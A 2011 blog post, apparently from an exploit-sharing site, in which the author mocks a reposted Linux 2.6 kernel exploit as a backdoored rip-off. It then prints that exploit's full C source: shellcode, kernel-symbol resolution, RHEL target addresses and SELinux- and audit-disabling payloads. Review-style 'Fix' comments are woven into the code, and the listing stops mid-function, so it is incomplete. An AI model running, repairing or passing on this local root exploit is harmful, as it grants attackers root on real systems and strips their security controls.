Help pay for xds lawyer fees.
LR

LINUX 2.6.* Local x86_64 (ONLY) Backdoored AB rip-off code

Posted on 30th September 2011 in Exploits

We face a new low.. from 133day.com, this comes as a ‘new’ 2011 kernel exploit, i looked thru it, it is STILL backdoored like the original ABftw.c code, which will always bind a port, to usually 9999 i believe but, correct me if im wrong, this is a no brainer to see that it is simple…shellcode-hides-stuffs !
AB wont stand for this rubbuish, and theyre backdoor, is NON prtable :P
SO, this is being brought in front, and exposed, for the pathetic ripoff of ac1db1tch3z ,who unlike these jerkwads, actually KNOW theyre stuff.
this code is not even trying to use a new vector :s it still handles syscalls via int 0x80, so how will this beat a 2010 kernel ?
Anyhow, there is better exploit now for this, and much smaller, with no backdoors, and no mmap() needed. YES it is on this website, if your regged it will appear, unregged do NOT SEE all posts.
i would say, best todo is simply add us to a RSS feed, if anyone wants me to put up info + .tcl file on using eggdrop-with-rss for theyre own mIRC channels etc, just send me some ask in the form of a reply or comment even just pm..and ill be happy to make it, until there is a need then, what is the point.many people do not use tcl, or, dont use eggdrops on theyre linux box, they consider it security risk, but, i guess i use my one, from a registered shell account 9thx guys @ xzibition/Bryan.D in particular for his timeless adminship)
Again, thanks to all my #Haxnet @ EFNet friends ;>
it is now forsure, the best +ps channel ever made i think :P
Anyhow, feel free to show me, what this can do, this new exploit posted only TODAY mind you on 1337day.com, why is this, going to beat a -stab- kernel,and, i hope this aint some grab at a new method of enforcing linux and dummying it, coz, that is old to… I will post a grsec+selinux+chroot breakout, code wich works tho, wich does not need one bit of shellcode..nor shuld this smashing of stack on this, wont work on most boxes simply coz mmap() permission denied is still going to block it… you cannot make codes like this, thats just BS, NOTHING was even noted, and, this is still MCAST_FILTER attack… so, what is diffeent, again i ask… and, oh, btw, if u want to backdoor yourself, sure, go ahead, the cr3d shellcode is really a backdoor, or was it the idt…. :P
have fun.
The real deal, is NOT this crap.. believe in me this.
cheers loyal readers
xd

PS: IT-Undergound is alive and well =) i am glad and hope they can get some site up soon with codes, i posted one of theyre sshd bruter for win32 actually, wich is from roy-def8 ,and he is a top guy!
Greets to anyone i missed, but, pls, try to explain to me what this thing is going to do, like, why not try find another vector at least, rather than 0x80, then we would at least have a new attack…and those targets, just suck… they can be taken out with a bash script :P
So, please, stop posting rubbish like this, and , concentrate on things like, the recent FreeBSD-REL-STAB bugs in compress and in ipc.. that one, is specially nice, coz it is socket based, and alot like sendmessage.. very easy to code, but ill leave that for someone like kcope, so he can broaden his arsenal ;p hehe, like it isnt big enough!
peace to my ‘homies’ ? OK!

The alleged bad code, and posted as ’0day on 133day.com ROFL!!!!

/*
kernel-2.6.30 2010 Local Root Exploit
====================================================
Author : Th3 L0rd Dilaw [GarA]
Home : Mafia Hack Team & www.Arhack.net
Exploit DataBase: 1337day.com
Gr33tz : Dr.Sayros & Last breath & Dr.BiLLi &
Dr.Milas & O-Snip3r & El Boss Gangster
This Local work also on :
2.6.30 .10 /*/ 2.6.30 .1 /*/ 2.6.30 -rc6 /*/ 2.6.30 -rc5 /*/ 2.6.30 -rc3 /*/ 2.6.30 -rc2 /*/ 2.6.30 -rc1 /*/
====================================================
*/
#include <poll.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <sys/utsname.h>
#include <sys/socket.h>
#include <sched.h>
#include <netinet/in.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <errno.h>
/*
 * Build gate: this file compiles only as a 32-bit (__i386__) binary. The
 * inline asm in bitch_call() below uses 32-bit registers and `int $0x80`,
 * while the addresses and payloads it carries are 64-bit, i.e. a 32-bit
 * process driving a 64-bit kernel's compat path.
 * NOTE(review): the #endif that should close this #else does not appear
 * anywhere in the visible listing, so the file as posted is not complete.
 * NOTE(review): most identifiers below start with a double underscore;
 * those names are reserved for the implementation in C.
 */
#ifndef __i386__
#error "x86_64 is the targets here.."
#else
/* NOTE(review): defined after all #include lines above, so it has no
 * effect on the headers that were already processed. */
#define _GNU_SOURCE
/* Obfuscated aliases used throughout: 32-bit unsigned, 64-bit unsigned, memcpy. */
#define __dgdhdytrg55 unsigned int
#define __yyrhdgdtfs66ytgetrfd unsigned long long
#define __dhdyetgdfstreg__ memcpy

#define BANNER "Ac1dB1tCh3z VS Linux kernel 2.6 kernel\n"

/* Files read at runtime and the kernel symbol names resolved from them
 * (see get_sym_ex() and put_your_hands_up_hooker()). */
#define KALLSYMS              "/proc/kallsyms"
#define TMAGIC_66TDFDRTS      "/proc/timer_list"
#define SELINUX_PATH          "/selinux/enforce"
#define RW_FOPS               "timer_list_fops"
#define PER_C_DHHDYDGTREM7765 "per_cpu__current_task"
#define PREPARE_GGDTSGFSRFSD  "prepare_creds"
#define OVERRIDE_GGDTSGFSRFSD "override_creds"
#define REVERT_DHDGTRRTEFDTD  "revert_creds"
/* Fixed user-space addresses: Y0Y0SMAP is mmap'ed by y0y0stack() and its
 * top (Y0Y0STOP) is the stack pointer bitch_call() switches to; Y0Y0CMAP
 * is mmap'ed by y0y0code() and J0J0S / J0J0R00T (both inside that page)
 * are where main() copies the two payload byte strings. */
#define Y0Y0SMAP 0x100000UL
#define Y0Y0CMAP 0x200000UL
#define Y0Y0STOP (Y0Y0SMAP+0xFFC)
#define J0J0S 0x00200000UL
#define J0J0R00T 0x002000F0UL
#define PAGE_SIZE 0x1000
/* Bits of the global `flags`:
 *   0x1  set for release >= 2.6.30 (per-cpu offset needed)
 *   0x2  set for release >= 2.6.29 (cred-function payload selected)
 *   0x4  /proc/kallsyms was readable
 *   0x8  IDT vector disabled (-f, -l); not consulted elsewhere in this file
 *   0x10 fops vector disabled (-i, -l)
 *   0x20 LSM vector disabled (-i, -f)
 *   0x40 add the SELinux-disabling bytes (-s) */
#define KERN_DHHDYTMLADSFPYT 0x1
#define KERN_DGGDYDTEGGETFDRLAK 0x2
#define KERN_HHSYPPLORQTWGFD 0x4
#define KERN_DIS_GGDYYTDFFACVFD_IDT 0x8
#define KERN_DIS_DGDGHHYTTFSR34353_FOPS 0x10
#define KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM 0x20
#define KERN_DIS_GGSTEYGDTREFRET_SEL1NUX 0x40
/* RHEL/CentOS 4 or 5 release strings carry ".el4" / ".el5". */
#define isRHHGDPPLADSF(ver) (strstr(ver, ".el4") || strstr(ver,".el5"))
/* Defined, so y0y0code() maps RW only and main() remaps via rey0y0code(). */
#define TRY_REMAP_DEFAULT 1

/* Output / exit helpers. __yyy_tegdtfsrer() passes its argument straight
 * to fprintf as the format string, so it must only ever receive string
 * literals (every call site in this file does). */
#define __gggdfstsgdt_dddex(f, a...) do { fprintf(stdout, f, ## a); } while(0)
#define __pppp_tegddewyfg(s) do { fprintf(stdout, "%s", s); } while(0)
#define __xxxfdgftr_hshsgdt(s) do { perror(s); exit(-1); } while(0)
#define __yyy_tegdtfsrer(s) do { fprintf(stderr, s); exit(-1); } while(0)

/* Process-wide state shared by the helpers below. */
static char buffer[1024];              /* optval payload; filled by __setmcbuffer() */
static int s;                          /* AF_INET/SOCK_DGRAM socket created in main() */
static int flags=0;                    /* KERN_* bits, see the #defines above */
volatile static socklen_t magiclen=0;  /* optlen handed to the kernel; set before each bitch_call() */
static int useidt=0, usefops=0, uselsm=0;  /* which vector env_prepare() selected */
/* _m_fops: timer_list_fops address (-k or kallsyms); _m_cred: prepare/override/
 * revert_creds addresses (-c or kallsyms), patched into r1ngrrrrrrr. */
static __yyrhdgdtfs66ytgetrfd _m_fops=0,_m_cred[3] = {0,0,0};
static __dgdhdytrg55 _m_cpu_off=0;     /* per_cpu__current_task offset (-o or kallsyms) */
static char krelease[64];              /* utsname.release, filled by wtfyourunhere_heee() */
static char kversion[128];             /* utsname.version, filled by wtfyourunhere_heee() */

/*
 * Raw machine-code payloads and the byte offsets at which they are patched
 * before being copied into the fixed code page (see put_your_hands_up_hooker(),
 * p4tch_sel1nux_codztegfaddczda() and main()). The 0x41/0x42/0x43 runs and the
 * zeroed dwords are placeholders overwritten at the offsets named next to each
 * array; the 0x90 runs are the regions that receive the SELinux-disabling
 * bytes. The bytes themselves are not decoded in this review.
 */
/* ttrg0ccc: "standard" payload (release < 2.6.29); the 4 bytes at R0C_0FF
 * are replaced with the caller's uid in main(). */
#define R0C_0FF 14

static char ttrg0ccc[]=
"\x51\x57\x53\x56\x48\x31\xc9\x48\x89\xf8\x48\x31\xf6\xbe\x41\x41\x41\x41"
"\x3b\x30\x75\x1f\x3b\x70\x04\x75\x1a\x3b\x70\x08\x75\x15\x3b\x70\x0c"
"\x75\x10\x48\x31\xdb\x89\x18\x89\x58\x04\x89\x58\x08\x89\x58\x0c\xeb\x11"
"\x48\xff\xc0\x48\xff\xc1\x48\x81\xf9\x4c\x04\x00\x00\x74\x02"
"\xeb\xcc\x5e\x5b\x5f\x59\xc3";
/* r1ngrrrrrrr: cred-function payload (release >= 2.6.29); the three 8-byte
 * placeholders at these offsets take _m_cred[0..2]. Not `static`, unlike
 * every other array here. */
#define R0YTTTTUHLFSTT_OFF1 5
#define R0YGGSFDARTDF_DHDYTEGRDFD_D 21
#define R0TDGFSRSLLSJ_SHSYSTGD 45

char r1ngrrrrrrr[]=
"\x53\x52\x57\x48\xbb\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd3"
"\x50\x48\x89\xc7\x48\xbb\x42\x42\x42\x42\x42\x42\x42\x42"
"\xff\xd3\x48\x31\xd2\x89\x50\x04\x89\x50\x14\x48\x89\xc7"
"\x48\xbb\x43\x43\x43\x43\x43\x43\x43\x43"
"\xff\xd3\x5f\x5f\x5a\x5b\xc3";

/* ttrfd0: fops/LSM first-stage. Offset 7: 4-byte _m_cpu_off; offset 13:
 * 8-byte J0J0R00T; offset 25: start of the 0x90 region that
 * p4tch_sel1nux_codztegfaddczda() overwrites. */
#define RJMPDDTGR_OFF 13
#define RJMPDDTGR_DHDYTGSCAVSF 7
#define RJMPDDTGR_GDTDGTSFRDFT 25

static char ttrfd0[]=
"\x57\x50\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"
"\x58\x5f"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xc3";

/* implement selinux bypass for IDT */
/* ruujhdbgatrfe345: IDT first-stage. Offset 8: 4-byte _m_cpu_off;
 * offset 14: 8-byte J0J0R00T; offset 27: start of the 0x90 region. */
#define RJMPDDTGR_OFF_IDT 14
#define RJMPDDTGR_DYHHTSFDARE 8
#define RJMPDDTGR_DHDYSGTSFDRTAC_SE 27

static char ruujhdbgatrfe345[]=
"\x0f\x01\xf8\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"
"\x0f\x01\xf8"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x48\xcf";

/* dis4blens4sel1nuxhayettgdr64545: SELinux-disabling fragment spliced into
 * the 0x90 regions above. Offset 10 takes table->selinux_enforcing,
 * offset 23 table->audit_enabled (see p4tch_sel1nux_codztegfaddczda()). */
#define CJE_4554TFFDTRMAJHD_OFF 10
#define RJMPDDTGR_AYYYDGTREFCCV7761_OF 23

static char dis4blens4sel1nuxhayettgdr64545[]=
"\x41\x52\x50"
"\xb8\x00\x00\x00\x00"
"\x49\xba\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x89\x02"
"\x49\xba\x42\x42\x42\x42\x42\x42\x42\x42"
"\x41\x89\x02"
"\x58\x41\x5a";

/* rhel LSM stuffs */
#define RHEL_LSM_OFF 98

/*
 * One known RHEL kernel: five kernel addresses plus the exact uname
 * release/version strings that identify the build. Entries are matched
 * by string comparison in lsm_rhel_find_target(); the addresses are
 * consumed by main() (LSM path) and p4tch_sel1nux_codztegfaddczda().
 */
struct LSM_rhel {
  __yyrhdgdtfs66ytgetrfd selinux_ops;
  __yyrhdgdtfs66ytgetrfd capability_ops;
  __yyrhdgdtfs66ytgetrfd dummy_security_ops;
  __yyrhdgdtfs66ytgetrfd selinux_enforcing;
  __yyrhdgdtfs66ytgetrfd audit_enabled;
  const char *krelease;   /* utsname.release to match */
  const char *kversion;   /* utsname.version to match */
};

/*
 * Hard-coded target table. NOTE(review): entries 2 and 4 carry the same
 * release string and identical addresses and differ only in the version
 * (build date) string, so a kernel matching either is handled the same way.
 * Not `static`, unlike most file-scope data here.
 */
struct LSM_rhel known_targets[4]= {
  {
    0xffffffff8031e600ULL,
    0xffffffff8031fec0ULL,
    0xffffffff804acc00ULL,
    0xffffffff804af960ULL,
    0xffffffff8049b124ULL,

    "2.6.18-164.el5",
    "#1 SMP Thu Sep 3 03:28:30 EDT 2009"  // to manage minor/bug fix changes
  },
  {
   0xffffffff8031f600ULL,
   0xffffffff80320ec0ULL,
   0xffffffff804afc00ULL,
   0xffffffff804b2960ULL,
   0xffffffff8049e124ULL,

   "2.6.18-164.11.1.el5",
   "#1 SMP Wed Jan 6 13:26:04 EST 2010"
  },
  {
    0xffffffff805296a0ULL,
    0xffffffff8052af60ULL,
    0xffffffff806db1e0ULL,
    0xffffffff806ddf40ULL,
    0xffffffff806d5324ULL,
    "2.6.18-164.11.1.el5xen",
    "#1 SMP Wed Jan 20 08:06:04 EST 2010"   // default xen
  },
  {
    0xffffffff8031f600ULL,// d selinux_ops
    0xffffffff80320ec0ULL,// d capability_ops
    0xffffffff804afc00ULL,// B dummy_security_ops
    0xffffffff804b2960ULL,// B selinux_enforcing
    0xffffffff8049e124ULL,// B audit_enabled
    "2.6.18-164.11.1.el5",
    "#1 SMP Wed Jan 20 07:32:21 EST 2010" // tripwire target LoL
   }
};

/* curr_target: table entry chosen by env_prepare(); dyn4nt4n1labeggeyrthryt
 * is the entry lsm_rhel_find_target() fills from /boot/System.map when no
 * hard-coded one matches (its krelease/kversion members stay unset). */
static struct LSM_rhel *curr_target=NULL, dyn4nt4n1labeggeyrthryt;
/* Argument block for the socketcall entered by bitch_call(); packed so the
 * five fields are consecutive 32-bit words (optval/optlen are 32-bit
 * pointers in this i386 build). Layout matches the get/setsockopt
 * argument order. */
struct socketcallAT {
  int s;
  int level;
  int optname;
  void *optval;
  volatile socklen_t *optlen;
} __attribute__((packed));

/* Destination of the `sidt` store in getidt(): 16-bit limit + 32-bit base
 * (unsigned long is 4 bytes in this i386 build). */
struct idt64from32_s {
  unsigned short limit;
  unsigned long base;
} __attribute__((packed));

/*
 * Read the IDT base with `sidt` and widen it to a 64-bit address by
 * forcing the upper 32 bits to all ones. Only the low 32 bits of the base
 * are captured by the 32-bit store, so this assumes the IDT lives at a
 * 64-bit address whose upper half is 0xFFFFFFFF (NOTE(review): that is an
 * assumption baked into the constant, not something this code checks).
 * Returns the reconstructed 64-bit IDT base.
 */
static __yyrhdgdtfs66ytgetrfd getidt() {
  struct idt64from32_s idt;
  memset(&idt, 0x00, sizeof(struct idt64from32_s));
  asm volatile("sidt %0" : "=m"(idt));
  return idt.base | 0xFFFFFFFF00000000ULL;
}

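/*
 * Heuristic presence check for SELinux: try to open SELINUX_PATH
 * ("/selinux/enforce") for reading. A successful open means the pseudo-file
 * exists, so SELinux is reported as enabled. A refused open also proves the
 * file exists; any other failure (typically ENOENT) means not enabled.
 *
 * Fix: the original only treated EPERM as "present but unreadable". A
 * refused open(2) reports EACCES, so a present-but-unreadable
 * /selinux/enforce was misreported as disabled.
 *
 * Returns 1 if SELinux appears to be enabled, 0 otherwise.
 */
static int isSelinuxEnabled(void) {
  FILE *selinux_f = fopen(SELINUX_PATH, "r");
  if (selinux_f == NULL) {
    /* Permission denied still proves the file is there. */
    return (errno == EACCES || errno == EPERM) ? 1 : 0;
  }
  fclose(selinux_f);
  return 1;
}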

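/*
 * Copy utsname.release / utsname.version into the caller's buffers and
 * return the second component of the release ("30" for "2.6.30-rc1") as
 * an int.
 *
 * out_release, out_version: destinations for the two uname strings. No
 *   sizes are passed, so callers must supply buffers at least as large as
 *   the utsname fields (65 bytes each on Linux). NOTE(review): the only
 *   caller passes krelease[64], one byte short for a maximal release
 *   string; the copies are left unbounded here because the signature
 *   carries no size.
 *
 * Returns the parsed component, or -1 when uname() fails, no digits
 * follow the second '.', or the digits parse as zero (atoi("0") counts as
 * failure, as before).
 *
 * Fix: the digit loop is now bounded by the local buffer; the original
 * wrote every digit after the second '.' into r[32] without a limit.
 */
static int wtfyourunhere_heee(char *out_release, char *out_version) {
  struct utsname buf;
  if (uname(&buf) < 0)
    return -1;
  strcpy(out_release, buf.release);
  strcpy(out_version, buf.version);

  /* Collect the digits that immediately follow the second '.'. */
  char r[32] = {0};
  size_t rlen = 0;
  int dots = 0;
  for (const char *ptr = buf.release; *ptr; ptr++) {
    if (dots == 2) {
      if (*ptr < '0' || *ptr > '9')
        break;
      if (rlen < sizeof r - 1)   /* bound the copy; extra digits are dropped */
        r[rlen++] = *ptr;
    }
    if (*ptr == '.')
      dots++;
  }
  if (rlen == 0 || !atoi(r))
    return -1;
  return atoi(r);
}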

/*
 * Patch the two kernel addresses from `table` into the SELinux-disabling
 * fragment, then splice that fragment (without its NUL) into the 0x90
 * regions of both first-stage payloads (ttrfd0 at offset 25,
 * ruujhdbgatrfe345 at offset 27).
 *
 * table: the chosen LSM_rhel entry; must be non-NULL (both callers in
 *   main() only reach this with curr_target set).
 *
 * NOTE(review): the 8-byte stores through a cast char* are unaligned
 * type-punning; they work on x86 but violate strict aliasing.
 */
static void p4tch_sel1nux_codztegfaddczda(struct LSM_rhel *table)
{
*((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + CJE_4554TFFDTRMAJHD_OFF)) = table->selinux_enforcing;
*((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + RJMPDDTGR_AYYYDGTREFCCV7761_OF)) = table->audit_enabled;
__dhdyetgdfstreg__(ttrfd0 + RJMPDDTGR_GDTDGTSFRDFT, dis4blens4sel1nuxhayettgdr64545, 

sizeof(dis4blens4sel1nuxhayettgdr64545)-1);
__dhdyetgdfstreg__(ruujhdbgatrfe345 + RJMPDDTGR_DHDYSGTSFDRTAC_SE, dis4blens4sel1nuxhayettgdr64545, 

sizeof(dis4blens4sel1nuxhayettgdr64545)-1);
}

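/*
 * Look up symbol `s` in a kallsyms / System.map style file ("<hex addr>
 * <type> <name>" per line) and return its address.
 *
 * s:           symbol name to find (exact match).
 * filename:    file to scan.
 * ignore_flag: when zero, the lookup is skipped unless `flags` has
 *              KERN_HHSYPPLORQTWGFD (kallsyms was readable).
 *
 * Returns the parsed address, or 0 when skipped, unreadable or not found.
 *
 * Fixes: the FILE handle was leaked on every return path; the hand-rolled
 * field copies had no terminator check (a line with no space ran past the
 * NUL) and could fill the 64-byte buffers without a trailing NUL before
 * strcmp/strtoull read them. Fields are now parsed with width-limited
 * sscanf and the handle is always closed.
 */
static __yyrhdgdtfs66ytgetrfd get_sym_ex(const char *s, const char *filename, int ignore_flag) {
  char line[512];
  char reloc_a[64];
  char reloc[64];
  __yyrhdgdtfs66ytgetrfd found = 0;

  if (!(flags & KERN_HHSYPPLORQTWGFD) && !ignore_flag)
    return 0;
  FILE *ka = fopen(filename, "r");
  if (!ka)
    return 0;
  while (fgets(line, sizeof line, ka) != NULL) {
    /* address, one-character type, name; anything after the name is ignored */
    if (sscanf(line, "%63s %*s %63s", reloc_a, reloc) != 2)
      continue;
    if (!strcmp(reloc, s)) {
      __gggdfstsgdt_dddex("OK! %s->%s\n", s, reloc_a);
      found = strtoull(reloc_a, NULL, 16);
      break;
    }
  }
  fclose(ka);
  return found;
}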

/* Resolve `s` through /proc/kallsyms, honouring the kallsyms-readable
 * flag (ignore_flag = 0). Returns the address or 0. */
static inline __yyrhdgdtfs66ytgetrfd get_sym(const char *s) {
  const int honour_flag = 0;
  __yyrhdgdtfs66ytgetrfd addr = get_sym_ex(s, KALLSYMS, honour_flag);
  return addr;
}

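/*
 * Parse the -c argument "hex,hex,hex" into _m_cred[0..2] (the three kernel
 * function addresses). Each field is read with strtoull base 16; an empty
 * field yields 0, as before.
 *
 * val: NUL-terminated string of three comma-separated hex numbers.
 *
 * Returns 0 on success, -1 if fewer than three fields are present.
 *
 * Fix: the per-field copy into the 64-byte local buffer was unbounded, so
 * an overlong field overran the stack; fields are now capped at 63 bytes.
 * The increment past the terminating NUL after the last field is also gone.
 */
static int parse_cred(const char *val) {
  const char *p = val;
  for (int i = 0; i < 3; i++) {
    char local[64] = {0};
    size_t n = 0;
    while (*p && *p != ',') {
      if (n < sizeof local - 1)   /* drop excess characters instead of overflowing */
        local[n++] = *p;
      p++;
    }
    if (!*p && i != 2)
      return -1;
    _m_cred[i] = strtoull(local, NULL, 16);
    if (*p == ',')
      p++;
  }
  return 0;
}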

#define SELINUX_OPS        "selinux_ops"
#define DUMMY_SECURITY_OPS "dummy_security_ops"
#define CAPABILITY_OPS     "capability_ops"
#define SELINUX_ENFORCING  "selinux_enforcing"
#define AUDIT_ENABLED      "audit_enabled"

/*
 * Pick the LSM_rhel entry for the running kernel.
 *
 * check_rhel: when non-zero, bail out unless krelease contains ".el4"/".el5".
 *
 * First compares krelease/kversion against every known_targets entry; if
 * none matches, resolves the five symbols from /boot/System.map-<release>
 * into the file-scope dyn4nt4n1labeggeyrthryt (its krelease/kversion
 * members are left unset).
 *
 * Returns the matching entry, &dyn4nt4n1labeggeyrthryt, or NULL if the
 * RHEL check fails or any of the five symbols could not be resolved.
 *
 * NOTE(review): mapbuf is built with strcpy/strcat; 17 + sizeof krelease
 * (64) fits in 128 today, but nothing enforces it. The loop compares a
 * signed `i` with a size_t.
 */
struct LSM_rhel *lsm_rhel_find_target(int check_rhel) {
   int i;
   char mapbuf[128];
   struct LSM_rhel *lsm = &(known_targets[0]);
   if(check_rhel && !isRHHGDPPLADSF(krelease)) {
     __pppp_tegddewyfg("N0t a RHEL k3rn3l! \n");
     return NULL;
   }
   __pppp_tegddewyfg("L00k1ng f0r kn0wn t4rg3tz\n");
   for(i=0; i<sizeof(known_targets)/sizeof(struct LSM_rhel); i++, lsm++) {
     if(!strcmp(krelease, lsm->krelease) && !strcmp(kversion, lsm->kversion)) {
       __gggdfstsgdt_dddex("Th1z 1z good as rooted. kn0wn t4rg3t: %s %s \n", lsm->krelease, lsm->kversion);
       return lsm;
     }
   }
   __pppp_tegddewyfg("c0mput3r 1z aqu1r1ng n3w t4rg3t\n");
   strcpy(mapbuf, "/boot/System.map-");
   strcat(mapbuf, krelease);

   /* ignore_flag=1: System.map is read even when kallsyms was not readable */
   dyn4nt4n1labeggeyrthryt.selinux_ops        = get_sym_ex(SELINUX_OPS, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.dummy_security_ops = get_sym_ex(DUMMY_SECURITY_OPS, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.capability_ops     = get_sym_ex(CAPABILITY_OPS, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.selinux_enforcing  = get_sym_ex(SELINUX_ENFORCING, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.audit_enabled      = get_sym_ex(AUDIT_ENABLED, mapbuf, 1);

   if(!dyn4nt4n1labeggeyrthryt.selinux_ops || !dyn4nt4n1labeggeyrthryt.dummy_security_ops ||
      !dyn4nt4n1labeggeyrthryt.capability_ops || !dyn4nt4n1labeggeyrthryt.selinux_enforcing ||
      !dyn4nt4n1labeggeyrthryt.audit_enabled)
    return NULL;
   return &dyn4nt4n1labeggeyrthryt;
}

/*
 * Probe the host and parse the command line.
 *
 * 1. Tests whether /proc/kallsyms is readable (sets KERN_HHSYPPLORQTWGFD).
 *    NOTE(review): read() and close() are issued on fd before/without
 *    checking that open() succeeded; harmless (EBADF) but sloppy.
 * 2. Fills krelease/kversion and derives the 2.6.x minor number; exits if
 *    that fails.
 * 3. Options: -i force IDT vector (disables fops+LSM), -f disable LSM+IDT,
 *    -l disable IDT+fops, -c a,b,c cred addresses, -k fops address,
 *    -s add SELinux-disabling bytes (only if /selinux/enforce is present),
 *    -o per-cpu offset. Unknown options fall through the switch silently.
 * 4. For minor >= 29 resolves the three cred functions (unless all were
 *    given with -c) and patches them into r1ngrrrrrrr; for minor >= 30
 *    resolves the per-cpu offset and patches it into both first-stage
 *    payloads. Either lookup failing is fatal.
 *
 * argc/argv: the program's arguments, passed straight to getopt().
 */
static void put_your_hands_up_hooker(int argc, char *argv[]) {
  int fd,ver,ret;
  char __b[16];
  fd = open(KALLSYMS, O_RDONLY);
  ret = read(fd, __b, 16); // dummy read
  if((fd >= 0 && ret > 0)) {
    __pppp_tegddewyfg("Kallsyms +r\t\n");
    flags |= KERN_HHSYPPLORQTWGFD;
  }
  close(fd);
  ver = wtfyourunhere_heee(krelease, kversion);
  if(ver < 0)
    __yyy_tegdtfsrer("Un4bl3 t0 g3t r3l3as3!\n");
  __gggdfstsgdt_dddex("K3rn3l r3l3as3: %s\n", krelease);
  if(argc != 1) {
    while( (ret = getopt(argc, argv, "siflc:k:o:")) > 0) {
      switch(ret) {
        case 'i':
          flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_DGDGHHYTTFSR34353_FOPS;
          useidt=1; // u have to use -i to force IDT Vector
          break;
        case 'f':
          flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_GGDYYTDFFACVFD_IDT;
          break;
	case 'l':
	  flags |= KERN_DIS_GGDYYTDFFACVFD_IDT|KERN_DIS_DGDGHHYTTFSR34353_FOPS;
	  break;
        case 'c':
          if(!optarg || parse_cred(optarg) < 0)
              __yyy_tegdtfsrer("Un4bl3 t0 p4s3 cr3d c0d3z\n");
          break;
        case 'k':
          if(optarg)
            _m_fops = strtoull(optarg, NULL, 16);
          else
	     __yyy_tegdtfsrer("Un4bl3 t0 p4rs3 f0P numb3rs\n");
          break;
        case 's':
          if(!isSelinuxEnabled())
            __pppp_tegddewyfg("s3l1nux 1z n0t 3n4bl3d!\n");
          else
            flags |= KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
          break;
        case 'o':
          if(optarg)
            _m_cpu_off = strtoull(optarg, NULL, 16);
	  else
	    __yyy_tegdtfsrer("Un4bl3 t0 p4rs3 f0p c0mput3r numb3rs\n");
          break;
      }
    }
  }
  if(ver >= 29) // needs cred structure
  {
    flags |= KERN_DGGDYDTEGGETFDRLAK;
    /* -c values win; kallsyms is consulted only if any of the three is missing */
    if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2]) {
      _m_cred[0] = get_sym(PREPARE_GGDTSGFSRFSD);
      _m_cred[1] = get_sym(OVERRIDE_GGDTSGFSRFSD);
      _m_cred[2] = get_sym(REVERT_DHDGTRRTEFDTD);
    }
    if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2]) {
      __yyy_tegdtfsrer("Err0r 1n s3tt1ng cr3d sh3llc0d3z\n");
    }
    __pppp_tegddewyfg("Kernel Credentials detected\n");
    /* unaligned 8-byte stores into the placeholder runs of r1ngrrrrrrr */
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YTTTTUHLFSTT_OFF1)) = _m_cred[0];
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YGGSFDARTDF_DHDYTEGRDFD_D)) = _m_cred[1];
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0TDGFSRSLLSJ_SHSYSTGD)) = _m_cred[2];
  }
  if(ver >= 30)  // needs cpu offset
  {
    flags |= KERN_DHHDYTMLADSFPYT;
    if(!_m_cpu_off)
    _m_cpu_off = (__dgdhdytrg55)get_sym(PER_C_DHHDYDGTREM7765);
    if(!_m_cpu_off)
      __yyy_tegdtfsrer("Err0r s3tt1ng up cr3d sh3llc0d3z\n");
    __pppp_tegddewyfg("K3rn3l per_cpu r3l0cs 3n4bl3d!\t\n");
    /* 4-byte stores into the zeroed dword of each first-stage payload */
    *((__dgdhdytrg55 *)(ttrfd0 + RJMPDDTGR_DHDYTGSCAVSF)) = _m_cpu_off;
    *((__dgdhdytrg55 *)(ruujhdbgatrfe345 + RJMPDDTGR_DYHHTSFDARE)) = _m_cpu_off;
  }
}

/*
 * Decide which vector to use, in priority order fops > LSM, with IDT only
 * when forced by -i (which also disables the other two).
 *
 * - fops: unless disabled, uses -k or resolves timer_list_fops; sets usefops.
 * - LSM:  only if fops was not chosen and not disabled; needs a RHEL
 *         target (check_rhel=1); sets uselsm and curr_target.
 * - IDT with -s: looks a target up without the RHEL check just to obtain
 *         the SELinux addresses; if none is found the -s flag is cleared.
 *
 * Exits if no vector was selected. NOTE(review): with usefops and -s,
 * main() never calls p4tch_sel1nux_codztegfaddczda() (it requires uselsm),
 * so -s has no effect on the fops path and curr_target stays NULL there.
 */
static void env_prepare(int argc, char* argv[]) {
  put_your_hands_up_hooker(argc, argv);
  if(!(flags & KERN_DIS_DGDGHHYTTFSR34353_FOPS))  {// try fops
    __pppp_tegddewyfg("Trying the F0P m3th34d\n");
    if(!_m_fops)
      _m_fops = get_sym(RW_FOPS);
    if(_m_fops) {
      usefops=1;
